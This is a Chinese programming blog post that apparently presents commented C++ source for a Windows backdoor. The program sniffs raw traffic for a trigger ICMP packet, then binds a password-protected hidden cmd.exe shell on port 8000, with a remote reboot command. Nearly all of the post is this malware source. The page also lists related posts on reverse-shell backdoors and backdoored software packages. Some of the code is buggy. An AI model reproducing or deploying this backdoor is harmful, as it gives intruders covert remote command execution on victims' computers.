简单后门 c++版 当年LION写 现详细注释

最新推荐文章于 2021-07-14 12:04:40 发布
最新推荐文章于 2021-07-14 12:04:40 发布
阅读量1.3k 收藏
点赞数
分类专栏: 病毒木马 文章标签: c++ buffer socket struct null attributes
//
//simple door
//二〇一零年 二月四号
//author: LION  
//路子注释
//广西桂林 EST
//
#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <Ws2tcpip.h>
#include <windows.h>
#include <MSTCPIP.h>
//
#pragma  comment(lib,"wsock32")
//
#define  ICMP_ECHO 8           //ICMP 回显请求报文类型为8
#define  ICMP_ECHOREPLY 0      //ICMP 回显应答报文的类型值为0
#define  SNIFFER_ICMP_SIZE 101 //监听ICMP包的大小
#define  BIND_PORT  8000       //默认bind shell 端口
#define  MAX_PACKET 10000      //最大ICMP包的大小
#define  DEF_PASSWORD "shandongluzi"//默认密码
#define  xmalloc(s)   HeapAlloc(GetProcessHeap(),HEAP_ZERO_MEMORY,(s))
//
//定义IP首部
//
typedef struct iphdr
{
//  类型          变量名称  解释                       字节数
        unsigned char h_verlen;//4位首部长度 4位IP版本号   1
        unsigned char tos;     //8位服务类型TOS            1
        unsigned short total_len;//16位总长度(字节)      2
        unsigned short ident;   //16位标识                 2
        unsigned short frag_and_flags;//3位标志位          2
        unsigned char  ttl;     //8位生存时间TTL           1
        unsigned char  proto;   //8位协议                  1
        unsigned short checksum;//16位IP首部校验和         2
        unsigned int   sourceIP;//32位IP地址               4
        unsigned int   destip;  //32位目的IP地址           4
}IPHeader;                  //IP首部长度为 20


//
//定义ICMP首部
//
typedef struct _ihdr
{
        unsigned char  i_type;//8位类型    1
        unsigned char  i_code;//8位代码    1
        unsigned short i_cksum;//16位校验和 2
        unsigned short i_id;//识别号(用进程号作为识别) 2
        unsigned short i_seq;//报文序列号  2

}ICMPHeader;//ICMP首部长度为 8

//
//函数定义
//
int  sniffer();//监听ICMP大小
//简单SNIFFER
void decode_sniffer(char *,int ,struct sockaddr_in *);
int  binshell();//绑定shell
DWORD dwBufferlen[10];  //缓冲区
DWORD dwBufferlnlen=1;  //缓冲长度
DWORD dwBytesReturned=0;//返回长度
HANDLE bindthread;      //句柄
//DOOR 主函数
//
int main()
{
        WSADATA wsaData;//定义数据
        int     retval;//返回值
        //SOCKET 初始化
        if ((retval=WSAStartup(MAKEWORD(2,2),&wsaData))!=0)
        {
     printf("WSASTARTUP failed:%d/n",retval);
         exit(-1);
        }
        //sniffer开始
        sniffer();
        //socker 结束
        WSACleanup();
        
        return 0;
}
//
//sniffer 函数
//
int sniffer()
{
int packsize=SNIFFER_ICMP_SIZE;//ICMP 包的大小
SOCKET sockersniffer;          //socket
struct sockaddr_in  fro; //原IP
struct sockaddr_in  des; //目的IP
struct hostent *hp; //本机IP  
int    sread; //读取
int    fromlen=sizeof(fro);//原IP长度
unsigned char LocalName[256];//本地名
char   *recvbuf;//接收数据
//
//创建一个原始socket,接受所有接受的包
if ((sockersniffer=WSASocket(AF_INET,SOCK_RAW,IPPROTO_IP,NULL,0,WSA_FLAG_OVERLAPPED))==INVALID_SOCKET)
{

        printf("wsasocket error %d/n",WSAGetLastError());
        return -1;
}
//获取本地地址
gethostname((char*)LocalName,sizeof(LocalName)-1);
if((hp=gethostbyname((char*)LocalName))==NULL)
{
        return -1;
}
//
//初始化DES目的IP
memset(&des,0,sizeof(des));
memset(&des.sin_addr.S_un.S_addr,(int)hp->h_addr_list[0],hp->h_length);
//
//tcp嗅探选项
des.sin_family=AF_INET;
des.sin_port=htons(8000);
//
//socket bind
bind(sockersniffer,(PSOCKADDR)&des,sizeof(des));
//
//设置socket为接受所有包
WSAIoctl(sockersniffer,SIO_RCVALL,&dwBufferlnlen,sizeof(dwBufferlnlen),&dwBufferlen,sizeof(dwBufferlen),&dwBytesReturned,NULL,NULL);
//分配scoket接受缓冲区大小为MAX_PACKET
recvbuf=(char*)xmalloc(MAX_PACKET);
printf("sinffer ok/n");
while(1)
{
       //读数据
           sread=recvfrom(sockersniffer,recvbuf,MAX_PACKET,0,(struct sockaddr*)&fro,&fromlen);
           //
           //读取数据出错
           if(sread==SOCKET_ERROR || sread <0)
           {
                         //超时 继续
                if(WSAGetLastError()==WSAETIMEDOUT)
                                {
                 continue;
                                }
                                printf("recvfrom failed :%d/n",WSAGetLastError());
                                return -1;
           }
       else
                     if (sread >=28)
                         {//
                          //如果读到数据的大小==监听包的大小+28
                                 if(sread==packsize+28)
                                 {//将接受到的数据交给sniffer解释程序处理
                                         decode_sniffer(recvbuf,sread-28,&fro);
                                 }
                                 
                         }
                         return 1;
}
}
//
//简单的sniffer解包程序
void decode_sniffer(char *buf, int bytes, struct sockaddr_in * from)
{
        //ICMP包
        ICMPHeader *icmphdr;
        //icmp首部地址等于BUF+IP首部长度 buf+20
    icmphdr=(ICMPHeader *)(buf+sizeof(IPHeader));
        //简单判断如果为ICMP请求包
        if(icmphdr->i_type==ICMP_ECHO)
        {
                //bind shell
                binshell();
        }
        else
                printf("/r/nGEt others packets!");
        return;

}
//
//bind shell
int binshell()
{
        int bport=BIND_PORT;//绑定端口
    SOCKET binserver,getclient;//客户端 和服务器
        struct sockaddr_in addrserver,addrClient;//客户端和服务器
        //
        //定义各种字符
        char   Buffer[4096];
        char   *Message="/r luzi EST/r/n";
        char   *getpass="/r enter password";
        char   *passok="/r/nok! enter ";
        char   *nothispass="/r/n sorry password is wrong/n";
        char   *exitok="/r/nExit ok/n";
        char   *rebook="/r/n Reboot now!/r/n";
        //
    //创建一个socket
        binserver=socket(AF_INET,SOCK_RAW,IPPROTO_IP);
        //服务器地址和端口制定
        addrserver.sin_family=AF_INET;
        addrserver.sin_port=htons(bport);
        addrserver.sin_addr.S_un.S_addr=ADDR_ANY;
        //设置超时
        int timeout=60000;
    setsockopt(binserver,SOL_SOCKET,SO_RCVTIMEO,(CHAR *)&timeout,sizeof(timeout));
        //设置重复利用端口
        UINT bRetUser=1;
        setsockopt(binserver,SOL_SOCKET,SO_REUSEADDR,(CHAR *)&bRetUser,sizeof(bRetUser));
        //监听端口
        bind(binserver,(struct sockaddr *)&addrserver,sizeof(addrserver));
        listen(binserver,2);
        printf("/r/n bind port on %d ok/n",bport);
        //接受客户端连接
        int ilen=sizeof(addrClient);
        //接受1次连接
        getclient=accept(binserver,(struct sockaddr *)&addrClient,&ilen);
        if(getclient!=INVALID_SOCKET)
        {
     //如果有连接进来设置延时为60S
                int itimeout=60000;
                setsockopt(getclient,SOL_SOCKET,SO_RCVTIMEO,(char *)&itimeout,sizeof(itimeout));
        }
        else
        {
                return -1;
        }
        //写欢迎信息
        send(getclient,Message,strlen(Message),0);
        //写密码验证信息
    send(getclient,getpass,strlen(getpass),0);
        //接受数据
        recv(getclient,Buffer,1024,0);
        //验证密码
        if(!(strstr(Buffer,DEF_PASSWORD)))
        {
     //如果密码错误,写密码错误信息
                send(getclient,nothispass,strlen(nothispass),0);
                printf("/r/n password not ghist");
                closesocket(getclient);
                closesocket(binserver);
                return -1;
        }
    //写通过验证信息
        send(getclient,passok,strlen(passok),0);
        //建立两个匿名管道
        HANDLE HReadpipe1,hWritePipe1,Headpipe2,Hwritepipe2;
        unsigned long lBytesRead;
        SECURITY_ATTRIBUTES sa;
        sa.nLength=12;
        sa.lpSecurityDescriptor=0;
        sa.bInheritHandle=TRUE;
        //创建PIPE
        CreatePipe(&HReadpipe1,&hWritePipe1,&sa,0);
        CreatePipe(&Headpipe2,&Hwritepipe2,&sa,0);
        STARTUPINFO siinfo;
        char cmdline[]="cmd.exe";
        //
        PROCESS_INFORMATION processinformation;
        ZeroMemory(&siinfo,sizeof(siinfo));
        siinfo.dwFlags=STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        siinfo.wShowWindow=SW_HIDE;
        siinfo.hStdInput=Headpipe2;//读socket写入PIPE2的数据
        siinfo.hStdOutput=siinfo.hStdError=hWritePipe1;//写数据
        printf("/r/ncreata pipe ok/n");
        //
        //创建一个cmd进程 由HREADPIPE2读数据 向HWRTIEPIPE1 写数据
        int bread=CreateProcess(NULL,cmdline,NULL,NULL,1,0,NULL,NULL,&siinfo,&processinformation);
        while (1)
        {
                //检查管道是否有数据返回
                int ret=PeekNamedPipe(HReadpipe1,Buffer,1024,&lBytesRead,0,0);
                if(lBytesRead)
                {
                        //从管道HREADPIPE1读数据
                        ret=ReadFile(HReadpipe1,Buffer,lBytesRead,&lBytesRead,0);
                        if(!ret) break;
                        //把管道HEADPIPE1读到的数据写如GETCILENT中
                        ret=send(getclient,Buffer,lBytesRead,0);
                        if(ret<=0) break;
                }
                else
                {

                        //如果连接getclient有接受到数据
                        lBytesRead=recv(getclient,Buffer,1024,0);
                    if (lBytesRead<=0) break;
                        //把从连接getclient读到的数据写入hwitre2
                        ret=WriteFile(Hwritepipe2,Buffer,lBytesRead,&lBytesRead,0);
                        if(lBytesRead>4 && Buffer[0]=='e' && Buffer[1]=='x' && Buffer[2]=='i' && Buffer[3]=='t')
                        {
                                //写退出信息
                                send(getclient,exitok,strlen(exitok),0);
                                closesocket(getclient);
                                closesocket(binserver);
                                return -1;
                        }
                        else
                        {

                                if(lBytesRead>6 && Buffer[0]=='r' && Buffer[1]=='e'&& Buffer[2]=='b'&& Buffer[3]=='o'&&Buffer[4]=='t')
                                {

                                        //写重启
                                        send(getclient,rebook,strlen(rebook),0);
                                        closesocket(getclient);
                                        closesocket(binserver);
                                        ExitWindowsEx(EWX_REBOOT,NULL);
                                        return 1;
                                }
                                 if(!ret) break;
                        }
                    

                }
         closesocket(getclient);
                 closesocket(binserver);
                 return 1;
        }

return 0;
}
clearver
关注
专栏目录
pangolin去后门修改.zip
01-06
【标题】"pangolin去后门修改.zip" 暗示了这是一个关于"Pangolin"工具的特别本,经过了去除后门的安全处理。Pangolin,又称为鳞片浏览器,是一款知名的网络安全扫描工具,常用于进行网络安全评估和漏洞检测。"去...
c++ 利用winpcap编制简单的路由程序_腾讯QQ升级程序存在漏洞,被利用植入后门病毒...
weixin_35940165的博客
12-24 134
近日,火绒安全团队根据用户反馈,发一起利用腾讯QQ升级漏洞植入后门病毒的攻击事件,攻击者可利用该漏洞下发任意恶意代码。火绒团队称:截止到目前,最新QQ(包括TIM、QQ、QQ轻聊、QQ国际等等)都存在该漏洞。经分析,该事件中被利用的升级漏洞曾在2015年就被公开披露过,之后腾讯对该漏洞进行修复并增加了校验逻辑。但从目前来看,QQ此处升级逻辑仍存在逻辑漏洞。另外,在排除本地劫持的可能后(LS...
计算机病毒中的后门病毒,国家计算机病毒中心发恶意后门程序新变种
weixin_36259939的博客
07-14 577
新华网天津7月27日电(记者张建新、袁帅)国家计算机病毒应急处理中心通过对互联网的监测发,近期出一种恶意后门程序变种Backdoor_Androm.EWC。该变种运行后,会将其自身复制到受感染操作系统的系统目录下,并重新命名。该变种会提升自身权限,将恶意代码注入指定进程中,以达到隐藏自身的目的。与此同时,该变种创建注册表启动项,保存恶意代码,实自身开机启动。另外,该变种还会在受感染系统的后台...
管道
qq_43812868的博客
09-04 733
管道是操作系统提供的进程之间的通讯方式之一,在所有的进程间通讯的方式中是最简单的。就像读文件、文件的方式一样,二期也用的是读文件和文件的函数进行进程间的通讯。 根据管道的方向分为: 单管道 只能单向进行传输 双管道 可以两进程之间互相传输 管道的命名方式可分为 命名管道 任意进程之间进行数据的传输 匿名管道 只能用于父进程和启动子进程之间通讯 使用函数: CreatePipe CreatePipe是创建一个匿名管道,并从中得到读管道的句柄。 BOOL WINAPI CreatePipe
(转)C++进程间和线程间通信
喜欢吃一口烤肉的啵啵
08-03 3042
 进程间和线程间通信   1.许多程序和应用一起工作达到某个共同目的的任务集。每个任务在开始执行前等待前一个任务完成。为了完成共同目标,相关线程或进程必须相互合作与通信。   2.依赖关系:对于任意两个线程或进程,存在4种依赖关系(如图)  (1)通信依赖性:当线程A需要来自线程B的数据进行操作时(单向依赖)  (2)合作依赖性:当线程A需要线程B拥有的资源,而且在线程A可以
C/C++ 匿名管道反弹CMDShell
热门推荐
CSDN
06-11 1万+
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实远程控制和命令执行。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。
C++映像劫持后门实例分析
09-03
C++映像劫持后门是一种利用操作系统的注册表功能,通过劫持正常的程序执行流程,将系统原本应当执行的程序替换为攻击者指定的恶意程序的技术。这种技术在早期主要用于绕过安全防护,使得恶意软件能够在没有用户察觉...
快速开发NFine框架(去后门本)
01-30
- **学习简单**:NFine框架的学习曲线相对较平缓,文档齐全,易于上手。 - **功能强大**:集成了权限管理、工作流、报表、图表等常见企业应用功能,满足多样化需求。 - **轻量级**:不依赖大型第三方库,保持框架...
phpstudy(后门).7z
06-03
phpstudy后门,可用于后门测试
phpstudy2018(后门).rar
01-05
【PHPStudy 2018 后门详解】 PHPStudy 是一款广泛使用的 PHP 开发环境集成包,它集成了 PHP、Apache、MySQL 等常用 Web 开发所需组件,方便开发者快速搭建本地开发环境。然而,"phpstudy2018(后门).rar" 这个...
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we can play the other code completion)
windows后门程序windows后门程序
02-02
windows后门程序windows后门程序wiwindows后门程序ndows后门程序
C++中的端口复用后门的编
桂林哈秋 - 我想学编程
03-29 1927
原文:http://hi.baidu.com/biweilun/blog/item/8c13b5197fb9514143a9adad.html端口复用后门很多人认为挺有难度的,要强行将Windows正在使用的开放端口占掉,然后插入我们的后门,一般人都以为必须在ring0下面进行,其实完全没有必要,下面给出一段我研究的代码,去除了几行关键的代码,防止居心不良的人直接拿去编译。加上了注释,将就着看
安全之路 —— C/C++后门的服务自启动
dengdao1372的博客
08-24 328
简介 Windows NT系统后门要实自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发C++代码样例 ////////////////////////////////////////////////////////////// // // Fil...
c++之const
lion_cxq的博客
06-16 114
1.常量 C++ const 允许指定一个语义约束,编译器会强制实施这个约束,允许程序员告诉编译器某值是保持不变的。 const int a = 10; int const a = 10; 代码: const int a = 10; int* p = (int*)& a; *p = 20; cout <<"a ="<< a << endl; cout <<"*p1 =" <<*p << endl; int const b
反向连接后门的使用
djyangmaowei的专栏
05-29 1349
这是一个反向连接的源程序 通过对这个程序的研究我可以知道一个cmd shell是怎么建立并实的这是一个单管道的程序 为此我还专门看了一下书中所讲的零管道和双管道用瑞士军刀进行监听 最后得到一个cmd shell是不是溢出攻击也是要用到这个哟 嘿嘿 幻想... #include#include#pragma comment(lib,"ws2_32.lib")void m
一步一步教你使用CGI实一个简单后门
meishadevs的个人博客
11-21 6908
程序实例1:
C++基础通信:构建简单服务与协议处理
这篇文档详细介绍了在C++中通过各种通信手段(如C Shell、Socket、注册服务等)在Windows系统中进行简单通信的方法,并特别关注了兼容性、性能优化以及必要的系统依赖。对于C++开发者来说,这是理解和实跨平台通信...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值